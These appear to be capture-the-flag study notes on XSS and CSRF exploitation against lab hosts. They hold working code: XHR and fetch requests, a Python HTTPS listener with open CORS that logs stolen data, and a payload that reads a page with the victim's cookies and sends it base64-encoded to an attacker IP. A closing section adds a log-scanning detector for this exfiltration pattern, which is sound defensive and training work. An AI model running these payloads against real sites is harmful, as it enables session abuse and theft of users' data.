In this section we will refresh the XSS and CSRF exploitation techniques.

Sending a POST request using XMLHttpRequest

var xhr = new XMLHttpRequest();
// third argument false = synchronous request (deprecated on the main thread; use true for async)
xhr.open('POST', 'http://exfiltrate.htb/', false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send('param1=hello&param2=world');


Now let's do the same with the Fetch API.

// top-level await works in the browser console or an ES module; elsewhere wrap it in an async function
const response = await fetch('http://exfiltrate.htb/', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    },
    body: 'param1=hello&param2=world',
});


We can build a custom HTTPS Python server to receive the requests.

Let's generate a self-signed certificate. A browser will not trust it by default, so requests from a victim's browser reach this server only once the certificate is trusted.

openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes


Now let’s go and create the server.

from http import server
import ssl

class CustomRequestHandler(server.SimpleHTTPRequestHandler):
    def do_OPTIONS(self):
        # Answer the CORS preflight so a cross-origin fetch/XHR that sets
        # Content-Type gets past the browser's preflight check.
        self.send_response(200)
        self.send_header("Access-Control-Allow-Origin", "*")
        self.send_header("Access-Control-Allow-Methods", "GET, POST, OPTIONS")
        self.send_header("Access-Control-Allow-Headers", "Content-Type")
        self.end_headers()

    def do_GET(self):
        super().do_GET()  # default static file serving from the current directory

    def do_POST(self):
        # Read the request body and write it to the server log.
        length = int(self.headers.get('Content-Length', 0))
        body = self.rfile.read(length)

        if body:
            self.log_message("[i] POST body: %s", body.decode("utf-8", errors="replace"))

        self.send_response(200)
        self.end_headers()

print("Serving HTTPS on 0.0.0.0 port 4443 (https://0.0.0.0:4443/) ...")
httpd = server.HTTPServer(('0.0.0.0', 4443), CustomRequestHandler)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='./server.pem')  # key and certificate are both in server.pem
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()


var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://filterbypass.htb/home.php', true);
xhr.withCredentials = true; // send the victim's cookies with the request
xhr.onload = () => {
    // from an HTTPS page, an XHR to a plain http:// listener is blocked as mixed content;
    // the HTTPS server above avoids that
    var exfil = new XMLHttpRequest();
    exfil.open("POST", "http://10.10.16.197/log", true);
    exfil.setRequestHeader("Content-Type", "application/json");
    exfil.send(JSON.stringify({data: btoa(xhr.responseText)}));
    // top-level navigation is not subject to mixed-content blocking, but navigating away may cancel the POST above
    document.location = "http://10.10.16.197/log?r=" + btoa(xhr.responseText);
};
xhr.send();
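From the defender's side, the redirect form of the payload above leaves the stolen page base64-encoded in a query string, and the same shape shows up in a target's own proxy or web-server access logs. The following detection logic is an added example, not part of the original notes; the Combined Log Format regex and the sample log lines are constructed assumptions.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format (Apache/nginx style); the regex is an assumption, adjust it to your format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"'
)
B64_RE = re.compile(r'^[A-Za-z0-9+/]{32,}={0,2}$')  # 32+ chars skips short tokens
HTML_MARKERS = (b'<html', b'<!doctype', b'<body', b'<form', b'csrf', b'token')

def decode_b64(value):
    """Return the decoded bytes if value is well-formed base64, else None."""
    # btoa() output placed raw in a URL has '+' turned into ' ' by parse_qsl; restore it.
    value = value.replace(' ', '+')
    if not B64_RE.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def find_exfil_requests(log_lines):
    """Flag requests whose query string carries base64 that decodes to page content."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format
        url = urlsplit(m.group('target'))
        for name, value in parse_qsl(url.query):
            decoded = decode_b64(value)
            if decoded is None:
                continue
            found = [mk.decode() for mk in HTML_MARKERS if mk in decoded.lower()]
            if found:
                hits.append({'ip': m.group('ip'), 'path': url.path, 'param': name,
                             'markers': found, 'referer': m.group('referer'),
                             'preview': decoded[:40].decode('utf-8', 'replace')})
    return hits

# Constructed sample: one leaked page, one normal request, one short token.
SAMPLE_PAGE = b'<html><body><form><input type="hidden" name="csrf" value="x1"></form></body></html>'
SAMPLE_LEAK = base64.b64encode(SAMPLE_PAGE).decode()
SAMPLE_LOG = [
    f'10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /log?r={SAMPLE_LEAK} HTTP/1.1" 200 0 "https://filterbypass.htb/home.php"',
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html?page=2 HTTP/1.1" 200 512 "-"',
    '10.10.14.7 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=aGVsbG8gd29ybGQ= HTTP/1.1" 200 12 "-"',
]
```

Running `find_exfil_requests(SAMPLE_LOG)` reports only the first line, with the cross-origin referer and the decoded preview showing a form with a CSRF token.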